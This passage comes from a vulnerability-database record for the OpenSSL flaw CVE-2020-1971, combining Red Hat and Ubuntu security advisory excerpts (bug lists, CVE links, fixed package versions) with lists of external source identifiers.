Pipeline Builder\n1919260 - VM Template list actions should not wrap\n1919271 - NM prepender script doesn\u0027t support systemd-resolved\n1919341 - Updating ose-jenkins-agent-maven builder \u0026 base images to be consistent with ART\n1919360 - Need managed-cluster-info metric enabled for OCP monitoring telemetry\n1919379 - dotnet logo out of date\n1919387 - Console login fails with no error when it can\u0027t write to localStorage\n1919396 - A11y Violation: svg-img-alt on Pod Status ring\n1919407 - OpenStack IPI has three-node control plane limitation, but InstallConfigs aren\u0027t verified\n1919750 - Search InstallPlans got Minified React error\n1919778 - Upgrade is stuck in insights operator Degraded with \"Source clusterconfig could not be retrieved\" until insights operator pod is manually deleted\n1919823 - OCP 4.7 Internationalization Chinese tranlate issue\n1919851 - Visualization does not render when Pipeline \u0026 Task share same name\n1919862 - The tip information for `oc new-project  --skip-config-write` is wrong\n1919876 - VM created via customize wizard cannot inherit template\u0027s PVC attributes\n1919877 - Click on KSVC breaks with white screen\n1919879 - The toolbox container name is changed from \u0027toolbox-root\u0027  to \u0027toolbox-\u0027 in a chroot environment\n1919945 - user entered name value overridden by default value when selecting a git repository\n1919968 - [release-4.7] Undiagnosed panic detected in pod runtime.go:76: invalid memory address or nil pointer dereference\n1919970 - NTO does not update when the tuned profile is updated. \n1919999 - Bump Cluster Resource Operator Golang Versions\n1920027 - machine-config-operator consistently failing during 4.6 to 4.7 upgrades and clusters do not install successfully with proxy configuration\n1920200 - user-settings network error results in infinite loop of requests\n1920205 - operator-registry e2e tests not working properly\n1920214 - Bump golang to 1.15 in cluster-resource-override-admission\n1920248 - re-running the pipelinerun with pipelinespec crashes the UI\n1920320 - VM template field is \"Not available\" if it\u0027s created from common template\n1920367 - When creating localvolumeset instance from the web console, the title for setting volumeMode is `Disk Mode`\n1920368 - Fix containers creation issue resulting in runc running on Guaranteed Pod CPUs\n1920390 - Monitoring \u003e Metrics graph shifts to the left when clicking the \"Stacked\" option and when toggling data series lines on / off\n1920426 - Egress Router CNI OWNERS file should have ovn-k team members\n1920427 - Need to update `oc login` help page since we don\u0027t support prompt interactively for the username\n1920430 - [V2V] [UI] Browser window becomes empty when running import wizard for the first time\n1920438 - openshift-tuned panics on turning debugging on/off. \n1920445 - e2e-gcp-ovn-upgrade job is actually using openshift-sdn\n1920481 - kuryr-cni pods using unreasonable amount of CPU\n1920509 - wait for port 6443 to be open in the kube-scheduler container; use ss instead of lsof\n1920524 - Topology graph crashes adding Open Data Hub operator\n1920526 - catalog operator causing CPU spikes and bad etcd performance\n1920551 - Boot Order is not editable for Templates in \"openshift\" namespace\n1920555 - bump cluster-resource-override-admission api dependencies\n1920571 - fcp multipath will not recover failed paths automatically\n1920619 - Remove default scheduler profile value\n1920655 - Console should not show the Create Autoscaler link in cluster settings when the CRD is not present\n1920674 - MissingKey errors in bindings namespace\n1920684 - Text in language preferences modal is misleading\n1920695 - CI is broken because of bad image registry reference in the Makefile\n1920756 - update generic-admission-server library to get the system:masters authorization optimization\n1920769 - [Upgrade] OCP upgrade from 4.6.13 to 4.7.0-fc.4 for \"network-check-target\" failed when \"defaultNodeSelector\" is set\n1920771 - i18n: Delete persistent volume claim drop down is not translated\n1920806 - [OVN]Nodes lost network connection after reboot on the vSphere UPI\n1920912 - Unable to power off BMH from console\n1920981 - When OCS was deployed with arbiter mode enable add capacity is increasing the count by \"2\"\n1920984 - [e2e][automation] some menu items names are out dated\n1921013 - Gather PersistentVolume definition (if any) used in image registry config\n1921023 - Do not enable Flexible Scaling to true for Internal mode clusters(revert to 4.6 behavior)\n1921087 - \u0027start next quick start\u0027 link doesn\u0027t work and is unintuitive\n1921088 - test-cmd is failing on volumes.sh pretty consistently\n1921248 - Clarify the kubelet configuration cr description\n1921253 - Text filter default placeholder text not internationalized\n1921258 - User Preferences: Active perspective and project change in the current window when selected in a different window\n1921275 - Panic in authentication-operator in (*deploymentController).updateOperatorDeploymentInfo\n1921277 - Fix Warning and Info log statements to handle arguments\n1921281 - oc get -o yaml --export returns \"error: unknown flag: --export\"\n1921458 - [SDK] Gracefully handle the `run bundle-upgrade` if the lower version operator doesn\u0027t exist\n1921556 - [OCS with Vault]: OCS pods didn\u0027t comeup after deploying with Vault details from UI\n1921572 - For external source (i.e GitHub Source) form view as well shows yaml\n1921580 - [e2e][automation]Test VM detail view actions dropdown does not pass\n1921610 - Pipeline metrics font size inconsistency\n1921644 - [e2e][automation] tests errors with wrong cloudInit new line syntax\n1921650 - CVE-2021-3121 gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation\n1921655 - [OSP] Incorrect error handling during cloudinfo generation\n1921713 - [e2e][automation]  fix failing VM migration tests\n1921762 - Serving and Eventing breadcrumbs should direct users back to tabbed page view\n1921774 - delete application modal errors when a resource cannot be found\n1921806 - Explore page APIResourceLinks aren\u0027t i18ned\n1921823 - CheckBoxControls not internationalized\n1921836 - AccessTableRows don\u0027t internationalize \"User\" or \"Group\"\n1921857 - Test flake when hitting router in e2e tests due to one router not being up to date\n1921880 - Dynamic plugins are not initialized on console load in production mode\n1921911 - Installer PR #4589 is causing leak of IAM role policy bindings\n1921921 - \"Global Configuration\" breadcrumb does not use sentence case\n1921949 - Console bug - source code URL broken for gitlab self-hosted repositories\n1921954 - Subscription-related constraints in ResolutionFailed events are misleading\n1922015 - buttons in modal header are invisible on Safari\n1922021 - Nodes terminal page \u0027Expand\u0027 \u0027Collapse\u0027 button not translated\n1922050 - [e2e][automation] Improve vm clone tests\n1922066 - Cannot create VM from custom template which has extra disk\n1922098 - Namespace selection dialog is not closed after select a namespace\n1922099 - Updated Readme documentation for QE code review and setup\n1922146 - Egress Router CNI doesn\u0027t have logging support. \n1922267 - Collect specific ADFS error\n1922292 - Bump RHCOS boot images for 4.7\n1922454 - CRI-O doesn\u0027t enable pprof by default\n1922473 - reconcile LSO images for 4.8\n1922573 - oc returns an error while using -o jsonpath when there is no resource found in the namespace\n1922782 - Source registry missing docker:// in yaml\n1922907 - Interop UI Tests - step implementation for updating feature files\n1922911 - Page crash when click the \"Stacked\" checkbox after clicking the data series toggle buttons\n1922991 - \"verify /run filesystem contents do not have unexpected content using a simple Docker Strategy Build\" test fails on OKD\n1923003 - WebConsole Insights widget showing \"Issues pending\" when the cluster doesn\u0027t report anything\n1923098 - [vsphere-problem-detector-operator] Need permission to access replicasets.apps resources\n1923102 - [vsphere-problem-detector-operator] pod\u0027s version is not correct\n1923245 - [Assisted-4.7] [Staging][Minimal-ISO] nodes fails to boot\n1923674 - k8s 1.20 vendor dependencies\n1923721 - PipelineRun running status icon is not rotating\n1923753 - Increase initialDelaySeconds for ovs-daemons container in the ovs-node daemonset for upgrade scenarios\n1923774 - Docker builds failing for openshift/cluster-resource-override-admission-operator\n1923802 - ci/prow/e2e-aws-olm build failing for openshift/cluster-resource-override-admission-operator\n1923874 - Unable to specify values with % in kubeletconfig\n1923888 - Fixes error metadata gathering\n1923892 - Update arch.md after refactor. \n1923894 - \"installed\" operator status in operatorhub page does not reflect the real status of operator\n1923895 - Changelog generation. \n1923911 - [e2e][automation] Improve tests for vm details page and list filter\n1923945 - PVC Name and Namespace resets when user changes os/flavor/workload\n1923951 - EventSources shows `undefined` in project\n1923973 - Dynamic plugin demo README does not contain info how to enable the ConsolePlugins\n1924046 - Localhost: Refreshing on a Project removes it from nav item urls\n1924078 - Topology quick search View all results footer should be sticky. \n1924081 - NTO should ship the latest Tuned daemon release 2.15\n1924084 - backend tests incorrectly hard-code artifacts dir\n1924128 - [sig-builds][Feature:Builds] verify /run filesystem contents  do not have unexpected content using a simple Docker Strategy Build\n1924135 - Under sufficient load, CRI-O may segfault\n1924143 - Code Editor Decorator url is broken for Bitbucket repos\n1924188 - Language selector dropdown doesn\u0027t always pre-select the language\n1924365 - Add extra disk for VM which use boot source PXE\n1924383 - Degraded network operator during upgrade to 4.7.z\n1924387 - [ja_JP][zh_CN] Incorrect warning message for deleting namespace on Delete Pod dialog box. \n1924480 - non cluster admin can not take VM snapshot: An error occurred, cannot set blockOwnerDeletion if an ownerReference refers to a resource you can\u0027t set finalizers on\n1924583 - Deprectaed templates are listed in the Templates screen\n1924870 - pick upstream pr#96901: plumb context with request deadline\n1924955 - Images from Private external registry not working in deploy Image\n1924961 - k8sutil.TrimDNS1123Label creates invalid values\n1924985 - Build egress-router-cni for both RHEL 7 and 8\n1925020 - Console demo plugin deployment image shoult not point to dockerhub\n1925024 - Remove extra validations on kafka source form view net section\n1925039 - [e2e] Fix Test - ID(CNV-5327) Change Custom Flavor while VM is running\n1925072 - NTO needs to ship the current latest stalld v1.7.0\n1925163 - Missing info about dev catalog in boot source template column\n1925200 - Monitoring Alert icon is missing on the workload in Topology view\n1925262 - apiserver getting 2 SIGTERM signals which was immediately making it exit code 1\n1925319 - bash syntax error in configure-ovs.sh script\n1925408 - Remove StatefulSet gatherer and replace it with gathering corresponding config map data\n1925516 - Pipeline Metrics Tooltips are overlapping data\n1925562 - Add new ArgoCD link from GitOps application environments page\n1925596 - Gitops details page image and commit id text overflows past card boundary\n1926556 - \u0027excessive etcd leader changes\u0027 test case failing in serial job because prometheus data is wiped by machine set test\n1926588 - The tarball of operator-sdk is not ready for ocp4.7\n1927456 - 4.7 still points to 4.6 catalog images\n1927500 - API server exits non-zero on 2 SIGTERM signals\n1929278 - Monitoring workloads using too high a priorityclass\n1929645 - Remove openshift:kubevirt-machine-controllers decleration from machine-api\n1929920 - Cluster monitoring documentation link is broken - 404 not found\n\n5. References:\n\nhttps://access.redhat.com/security/cve/CVE-2018-10103\nhttps://access.redhat.com/security/cve/CVE-2018-10105\nhttps://access.redhat.com/security/cve/CVE-2018-14461\nhttps://access.redhat.com/security/cve/CVE-2018-14462\nhttps://access.redhat.com/security/cve/CVE-2018-14463\nhttps://access.redhat.com/security/cve/CVE-2018-14464\nhttps://access.redhat.com/security/cve/CVE-2018-14465\nhttps://access.redhat.com/security/cve/CVE-2018-14466\nhttps://access.redhat.com/security/cve/CVE-2018-14467\nhttps://access.redhat.com/security/cve/CVE-2018-14468\nhttps://access.redhat.com/security/cve/CVE-2018-14469\nhttps://access.redhat.com/security/cve/CVE-2018-14470\nhttps://access.redhat.com/security/cve/CVE-2018-14553\nhttps://access.redhat.com/security/cve/CVE-2018-14879\nhttps://access.redhat.com/security/cve/CVE-2018-14880\nhttps://access.redhat.com/security/cve/CVE-2018-14881\nhttps://access.redhat.com/security/cve/CVE-2018-14882\nhttps://access.redhat.com/security/cve/CVE-2018-16227\nhttps://access.redhat.com/security/cve/CVE-2018-16228\nhttps://access.redhat.com/security/cve/CVE-2018-16229\nhttps://access.redhat.com/security/cve/CVE-2018-16230\nhttps://access.redhat.com/security/cve/CVE-2018-16300\nhttps://access.redhat.com/security/cve/CVE-2018-16451\nhttps://access.redhat.com/security/cve/CVE-2018-16452\nhttps://access.redhat.com/security/cve/CVE-2018-20843\nhttps://access.redhat.com/security/cve/CVE-2019-3884\nhttps://access.redhat.com/security/cve/CVE-2019-5018\nhttps://access.redhat.com/security/cve/CVE-2019-6977\nhttps://access.redhat.com/security/cve/CVE-2019-6978\nhttps://access.redhat.com/security/cve/CVE-2019-8625\nhttps://access.redhat.com/security/cve/CVE-2019-8710\nhttps://access.redhat.com/security/cve/CVE-2019-8720\nhttps://access.redhat.com/security/cve/CVE-2019-8743\nhttps://access.redhat.com/security/cve/CVE-2019-8764\nhttps://access.redhat.com/security/cve/CVE-2019-8766\nhttps://access.redhat.com/security/cve/CVE-2019-8769\nhttps://access.redhat.com/security/cve/CVE-2019-8771\nhttps://access.redhat.com/security/cve/CVE-2019-8782\nhttps://access.redhat.com/security/cve/CVE-2019-8783\nhttps://access.redhat.com/security/cve/CVE-2019-8808\nhttps://access.redhat.com/security/cve/CVE-2019-8811\nhttps://access.redhat.com/security/cve/CVE-2019-8812\nhttps://access.redhat.com/security/cve/CVE-2019-8813\nhttps://access.redhat.com/security/cve/CVE-2019-8814\nhttps://access.redhat.com/security/cve/CVE-2019-8815\nhttps://access.redhat.com/security/cve/CVE-2019-8816\nhttps://access.redhat.com/security/cve/CVE-2019-8819\nhttps://access.redhat.com/security/cve/CVE-2019-8820\nhttps://access.redhat.com/security/cve/CVE-2019-8823\nhttps://access.redhat.com/security/cve/CVE-2019-8835\nhttps://access.redhat.com/security/cve/CVE-2019-8844\nhttps://access.redhat.com/security/cve/CVE-2019-8846\nhttps://access.redhat.com/security/cve/CVE-2019-9455\nhttps://access.redhat.com/security/cve/CVE-2019-9458\nhttps://access.redhat.com/security/cve/CVE-2019-11068\nhttps://access.redhat.com/security/cve/CVE-2019-12614\nhttps://access.redhat.com/security/cve/CVE-2019-13050\nhttps://access.redhat.com/security/cve/CVE-2019-13225\nhttps://access.redhat.com/security/cve/CVE-2019-13627\nhttps://access.redhat.com/security/cve/CVE-2019-14889\nhttps://access.redhat.com/security/cve/CVE-2019-15165\nhttps://access.redhat.com/security/cve/CVE-2019-15166\nhttps://access.redhat.com/security/cve/CVE-2019-15903\nhttps://access.redhat.com/security/cve/CVE-2019-15917\nhttps://access.redhat.com/security/cve/CVE-2019-15925\nhttps://access.redhat.com/security/cve/CVE-2019-16167\nhttps://access.redhat.com/security/cve/CVE-2019-16168\nhttps://access.redhat.com/security/cve/CVE-2019-16231\nhttps://access.redhat.com/security/cve/CVE-2019-16233\nhttps://access.redhat.com/security/cve/CVE-2019-16935\nhttps://access.redhat.com/security/cve/CVE-2019-17450\nhttps://access.redhat.com/security/cve/CVE-2019-17546\nhttps://access.redhat.com/security/cve/CVE-2019-18197\nhttps://access.redhat.com/security/cve/CVE-2019-18808\nhttps://access.redhat.com/security/cve/CVE-2019-18809\nhttps://access.redhat.com/security/cve/CVE-2019-19046\nhttps://access.redhat.com/security/cve/CVE-2019-19056\nhttps://access.redhat.com/security/cve/CVE-2019-19062\nhttps://access.redhat.com/security/cve/CVE-2019-19063\nhttps://access.redhat.com/security/cve/CVE-2019-19068\nhttps://access.redhat.com/security/cve/CVE-2019-19072\nhttps://access.redhat.com/security/cve/CVE-2019-19221\nhttps://access.redhat.com/security/cve/CVE-2019-19319\nhttps://access.redhat.com/security/cve/CVE-2019-19332\nhttps://access.redhat.com/security/cve/CVE-2019-19447\nhttps://access.redhat.com/security/cve/CVE-2019-19524\nhttps://access.redhat.com/security/cve/CVE-2019-19533\nhttps://access.redhat.com/security/cve/CVE-2019-19537\nhttps://access.redhat.com/security/cve/CVE-2019-19543\nhttps://access.redhat.com/security/cve/CVE-2019-19602\nhttps://access.redhat.com/security/cve/CVE-2019-19767\nhttps://access.redhat.com/security/cve/CVE-2019-19770\nhttps://access.redhat.com/security/cve/CVE-2019-19906\nhttps://access.redhat.com/security/cve/CVE-2019-19956\nhttps://access.redhat.com/security/cve/CVE-2019-20054\nhttps://access.redhat.com/security/cve/CVE-2019-20218\nhttps://access.redhat.com/security/cve/CVE-2019-20386\nhttps://access.redhat.com/security/cve/CVE-2019-20387\nhttps://access.redhat.com/security/cve/CVE-2019-20388\nhttps://access.redhat.com/security/cve/CVE-2019-20454\nhttps://access.redhat.com/security/cve/CVE-2019-20636\nhttps://access.redhat.com/security/cve/CVE-2019-20807\nhttps://access.redhat.com/security/cve/CVE-2019-20812\nhttps://access.redhat.com/security/cve/CVE-2019-20907\nhttps://access.redhat.com/security/cve/CVE-2019-20916\nhttps://access.redhat.com/security/cve/CVE-2020-0305\nhttps://access.redhat.com/security/cve/CVE-2020-0444\nhttps://access.redhat.com/security/cve/CVE-2020-1716\nhttps://access.redhat.com/security/cve/CVE-2020-1730\nhttps://access.redhat.com/security/cve/CVE-2020-1751\nhttps://access.redhat.com/security/cve/CVE-2020-1752\nhttps://access.redhat.com/security/cve/CVE-2020-1971\nhttps://access.redhat.com/security/cve/CVE-2020-2574\nhttps://access.redhat.com/security/cve/CVE-2020-2752\nhttps://access.redhat.com/security/cve/CVE-2020-2922\nhttps://access.redhat.com/security/cve/CVE-2020-3862\nhttps://access.redhat.com/security/cve/CVE-2020-3864\nhttps://access.redhat.com/security/cve/CVE-2020-3865\nhttps://access.redhat.com/security/cve/CVE-2020-3867\nhttps://access.redhat.com/security/cve/CVE-2020-3868\nhttps://access.redhat.com/security/cve/CVE-2020-3885\nhttps://access.redhat.com/security/cve/CVE-2020-3894\nhttps://access.redhat.com/security/cve/CVE-2020-3895\nhttps://access.redhat.com/security/cve/CVE-2020-3897\nhttps://access.redhat.com/security/cve/CVE-2020-3898\nhttps://access.redhat.com/security/cve/CVE-2020-3899\nhttps://access.redhat.com/security/cve/CVE-2020-3900\nhttps://access.redhat.com/security/cve/CVE-2020-3901\nhttps://access.redhat.com/security/cve/CVE-2020-3902\nhttps://access.redhat.com/security/cve/CVE-2020-6405\nhttps://access.redhat.com/security/cve/CVE-2020-7595\nhttps://access.redhat.com/security/cve/CVE-2020-7774\nhttps://access.redhat.com/security/cve/CVE-2020-8177\nhttps://access.redhat.com/security/cve/CVE-2020-8492\nhttps://access.redhat.com/security/cve/CVE-2020-8563\nhttps://access.redhat.com/security/cve/CVE-2020-8566\nhttps://access.redhat.com/security/cve/CVE-2020-8619\nhttps://access.redhat.com/security/cve/CVE-2020-8622\nhttps://access.redhat.com/security/cve/CVE-2020-8623\nhttps://access.redhat.com/security/cve/CVE-2020-8624\nhttps://access.redhat.com/security/cve/CVE-2020-8647\nhttps://access.redhat.com/security/cve/CVE-2020-8648\nhttps://access.redhat.com/security/cve/CVE-2020-8649\nhttps://access.redhat.com/security/cve/CVE-2020-9327\nhttps://access.redhat.com/security/cve/CVE-2020-9802\nhttps://access.redhat.com/security/cve/CVE-2020-9803\nhttps://access.redhat.com/security/cve/CVE-2020-9805\nhttps://access.redhat.com/security/cve/CVE-2020-9806\nhttps://access.redhat.com/security/cve/CVE-2020-9807\nhttps://access.redhat.com/security/cve/CVE-2020-9843\nhttps://access.redhat.com/security/cve/CVE-2020-9850\nhttps://access.redhat.com/security/cve/CVE-2020-9862\nhttps://access.redhat.com/security/cve/CVE-2020-9893\nhttps://access.redhat.com/security/cve/CVE-2020-9894\nhttps://access.redhat.com/security/cve/CVE-2020-9895\nhttps://access.redhat.com/security/cve/CVE-2020-9915\nhttps://access.redhat.com/security/cve/CVE-2020-9925\nhttps://access.redhat.com/security/cve/CVE-2020-10018\nhttps://access.redhat.com/security/cve/CVE-2020-10029\nhttps://access.redhat.com/security/cve/CVE-2020-10732\nhttps://access.redhat.com/security/cve/CVE-2020-10749\nhttps://access.redhat.com/security/cve/CVE-2020-10751\nhttps://access.redhat.com/security/cve/CVE-2020-10763\nhttps://access.redhat.com/security/cve/CVE-2020-10773\nhttps://access.redhat.com/security/cve/CVE-2020-10774\nhttps://access.redhat.com/security/cve/CVE-2020-10942\nhttps://access.redhat.com/security/cve/CVE-2020-11565\nhttps://access.redhat.com/security/cve/CVE-2020-11668\nhttps://access.redhat.com/security/cve/CVE-2020-11793\nhttps://access.redhat.com/security/cve/CVE-2020-12465\nhttps://access.redhat.com/security/cve/CVE-2020-12655\nhttps://access.redhat.com/security/cve/CVE-2020-12659\nhttps://access.redhat.com/security/cve/CVE-2020-12770\nhttps://access.redhat.com/security/cve/CVE-2020-12826\nhttps://access.redhat.com/security/cve/CVE-2020-13249\nhttps://access.redhat.com/security/cve/CVE-2020-13630\nhttps://access.redhat.com/security/cve/CVE-2020-13631\nhttps://access.redhat.com/security/cve/CVE-2020-13632\nhttps://access.redhat.com/security/cve/CVE-2020-14019\nhttps://access.redhat.com/security/cve/CVE-2020-14040\nhttps://access.redhat.com/security/cve/CVE-2020-14381\nhttps://access.redhat.com/security/cve/CVE-2020-14382\nhttps://access.redhat.com/security/cve/CVE-2020-14391\nhttps://access.redhat.com/security/cve/CVE-2020-14422\nhttps://access.redhat.com/security/cve/CVE-2020-15157\nhttps://access.redhat.com/security/cve/CVE-2020-15503\nhttps://access.redhat.com/security/cve/CVE-2020-15862\nhttps://access.redhat.com/security/cve/CVE-2020-15999\nhttps://access.redhat.com/security/cve/CVE-2020-16166\nhttps://access.redhat.com/security/cve/CVE-2020-24490\nhttps://access.redhat.com/security/cve/CVE-2020-24659\nhttps://access.redhat.com/security/cve/CVE-2020-25211\nhttps://access.redhat.com/security/cve/CVE-2020-25641\nhttps://access.redhat.com/security/cve/CVE-2020-25658\nhttps://access.redhat.com/security/cve/CVE-2020-25661\nhttps://access.redhat.com/security/cve/CVE-2020-25662\nhttps://access.redhat.com/security/cve/CVE-2020-25681\nhttps://access.redhat.com/security/cve/CVE-2020-25682\nhttps://access.redhat.com/security/cve/CVE-2020-25683\nhttps://access.redhat.com/security/cve/CVE-2020-25684\nhttps://access.redhat.com/security/cve/CVE-2020-25685\nhttps://access.redhat.com/security/cve/CVE-2020-25686\nhttps://access.redhat.com/security/cve/CVE-2020-25687\nhttps://access.redhat.com/security/cve/CVE-2020-25694\nhttps://access.redhat.com/security/cve/CVE-2020-25696\nhttps://access.redhat.com/security/cve/CVE-2020-26160\nhttps://access.redhat.com/security/cve/CVE-2020-27813\nhttps://access.redhat.com/security/cve/CVE-2020-27846\nhttps://access.redhat.com/security/cve/CVE-2020-28362\nhttps://access.redhat.com/security/cve/CVE-2020-29652\nhttps://access.redhat.com/security/cve/CVE-2021-2007\nhttps://access.redhat.com/security/cve/CVE-2021-3121\nhttps://access.redhat.com/security/updates/classification/#moderate\n\n6. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2021 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBYDZ+bNzjgjWX9erEAQghXg//awGwjQxJ5LEZWBTdgyuCa8mHEi2rop5T\nlmebolBMNRSbo9gI8LMSHlvIBBFiV4CuFvfxE0AVLNentfzOTH11TxNWe1KQYt4H\nEmcGHPeHWTxKDkvAHtVcWXy9WN3y5d4lHSaq6AR1nHRPcj/k1upyx22kotpnYxN8\n4d49PjFTO3YbmdYpNLVJ9nY8izqUpTfM7YSyj6ANZSlaYc5Z215o6TPo6e3wobf4\nmWu+VfDS0v+/AbGhQhO2sQ7r2ysJ85MB7c62cxck4a51KiA0NKd4xr0TAA4KHnNL\nISHFzi5QYXu+meE+9wYRo1ZjJ5fbPj41+1TJbR6O4CbP0xQiFpcUSipNju3rGSGy\nAe5G/QGT8J7HzOjlKVvY3SFu/odENR6c+xUIr7IB/FBlu7DdPF2XxMZDQD4DKHEk\n4aiDbuiEL3Yf78Ic1RqPPmrj9plIwprVFQz+k3JaQXKD+1dBxO6tk+nVu2/5xNbM\nuR03hrthYYIpdXLSWU4lzq8j3kQ9wZ4j/m2o6/K6eHNl9PyqAG5jfQv9bVf8E3oG\nkrzc/JLvOfHNEQ/oJs/v/DFDmnAxshCCtGWlpLJ5J0pcD3EePsrPNs1QtQurVrMv\nRjfBCWKOij53+BinrMKHdsHxfur7GCFCIQCVaLIv6GUjX2NWI0voIVA8JkrFNNp6\nMcvuEaxco7U=\n=sw8i\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://listman.redhat.com/mailman/listinfo/rhsa-announce\n. Solution:\n\nFor information on upgrading Ansible Tower, reference the Ansible Tower\nUpgrade and Migration Guide:\nhttps://docs.ansible.com/ansible-tower/latest/html/upgrade-migration-guide/\nindex.html\n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n1790277 - CVE-2019-20372 nginx: HTTP request smuggling in configurations with URL redirect used as error_page\n1828406 - CVE-2020-11022 jquery: Cross-site scripting due to improper injQuery.htmlPrefilter method\n1850004 - CVE-2020-11023 jquery: Passing HTML containing \u003coption\u003e elements to manipulation methods could result in untrusted code execution\n1911314 - CVE-2020-35678 python-autobahn: allows redirect header injection\n1928847 - CVE-2021-20253 ansible-tower: Privilege escalation via job isolation escape\n\n5. \n\nBug Fix(es):\n\n* Configuring the system with non-RT kernel will hang the system\n(BZ#1923220)\n\n3. Bugs fixed (https://bugzilla.redhat.com/):\n\n1902111 - CVE-2020-27813 golang-github-gorilla-websocket: integer overflow leads to denial of service\n\n5. JIRA issues fixed (https://issues.jboss.org/):\n\nCNF-802 - Infrastructure-provided enablement/disablement of interrupt processing for guaranteed pod CPUs\nCNF-854 - Performance tests in CNF Tests\n\n6. Description:\n\nRed Hat 3scale API Management delivers centralized API management features\nthrough a distributed, cloud-hosted layer. It includes built-in features to\nhelp in building a more successful API program, including access control,\nrate limits, payment gateway integration, and developer experience tools. Bugs fixed (https://bugzilla.redhat.com/):\n\n1804533 - CVE-2020-9283 golang.org/x/crypto: Processing of crafted ssh-ed25519 public keys allows for panic\n1853652 - CVE-2020-14040 golang.org/x/text: possibility to trigger an infinite loop in encoding/unicode could lead to crash\n\n5. Description:\n\nRed Hat JBoss Web Server is a fully integrated and certified set of\ncomponents for hosting Java web applications. It is comprised of the Apache\nTomcat Servlet container, JBoss HTTP Connector (mod_cluster), the\nPicketLink Vault extension for Apache Tomcat, and the Tomcat Native\nlibrary. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. Bugs fixed (https://bugzilla.redhat.com/):\n\n1887648 - CVE-2020-13943 tomcat: Apache Tomcat HTTP/2 Request mix-up\n1903409 - CVE-2020-1971 openssl: EDIPARTYNAME NULL pointer de-reference\n1904221 - CVE-2020-17527 tomcat: HTTP/2 request header mix-up\n1917209 - CVE-2021-24122 tomcat: Information disclosure when using NTFS file system\n\n6. ==========================================================================\nUbuntu Security Notice USN-4662-1\nDecember 08, 2020\n\nopenssl, openssl1.0 vulnerability\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 20.10\n- Ubuntu 20.04 LTS\n- Ubuntu 18.04 LTS\n- Ubuntu 16.04 LTS\n\nSummary:\n\nOpenSSL could be made to crash if it processed specially crafted input. \n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 20.10:\n  libssl1.1                       1.1.1f-1ubuntu4.1\n\nUbuntu 20.04 LTS:\n  libssl1.1                       1.1.1f-1ubuntu2.1\n\nUbuntu 18.04 LTS:\n  libssl1.0.0                     1.0.2n-1ubuntu5.5\n  libssl1.1                       1.1.1-1ubuntu2.1~18.04.7\n\nUbuntu 16.04 LTS:\n  libssl1.0.0                     1.0.2g-1ubuntu4.18\n\nAfter a standard system update you need to reboot your computer to make all\nthe necessary changes",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2020-1971"
      },
      {
        "db": "VULHUB",
        "id": "VHN-173115"
      },
      {
        "db": "PACKETSTORM",
        "id": "160654"
      },
      {
        "db": "PACKETSTORM",
        "id": "160605"
      },
      {
        "db": "PACKETSTORM",
        "id": "161546"
      },
      {
        "db": "PACKETSTORM",
        "id": "161727"
      },
      {
        "db": "PACKETSTORM",
        "id": "160882"
      },
      {
        "db": "PACKETSTORM",
        "id": "161548"
      },
      {
        "db": "PACKETSTORM",
        "id": "162130"
      },
      {
        "db": "PACKETSTORM",
        "id": "161389"
      },
      {
        "db": "PACKETSTORM",
        "id": "160414"
      }
    ],
    "trust": 1.8
  },
  "external_ids": {
    "_id": null,
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2020-1971",
        "trust": 2.6
      },
      {
        "db": "TENABLE",
        "id": "TNS-2021-10",
        "trust": 1.7
      },
      {
        "db": "TENABLE",
        "id": "TNS-2021-09",
        "trust": 1.7
      },
      {
        "db": "TENABLE",
        "id": "TNS-2020-11",
        "trust": 1.7
      },
      {
        "db": "SIEMENS",
        "id": "SSA-389290",
        "trust": 1.7
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2021/09/14/2",
        "trust": 1.7
      },
      {
        "db": "PULSESECURE",
        "id": "SA44676",
        "trust": 1.7
      },
      {
        "db": "PACKETSTORM",
        "id": "160605",
        "trust": 0.8
      },
      {
        "db": "PACKETSTORM",
        "id": "161727",
        "trust": 0.8
      },
      {
        "db": "PACKETSTORM",
        "id": "162130",
        "trust": 0.8
      },
      {
        "db": "PACKETSTORM",
        "id": "160414",
        "trust": 0.8
      },
      {
        "db": "PACKETSTORM",
        "id": "160882",
        "trust": 0.8
      },
      {
        "db": "PACKETSTORM",
        "id": "161525",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "160916",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "160499",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "161379",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "160636",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "160704",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "161916",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "160523",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "162142",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "160961",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "160410",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.4104",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.0111",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.1193",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.0691",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.0099",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.0319",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.0584",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.0184.2",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
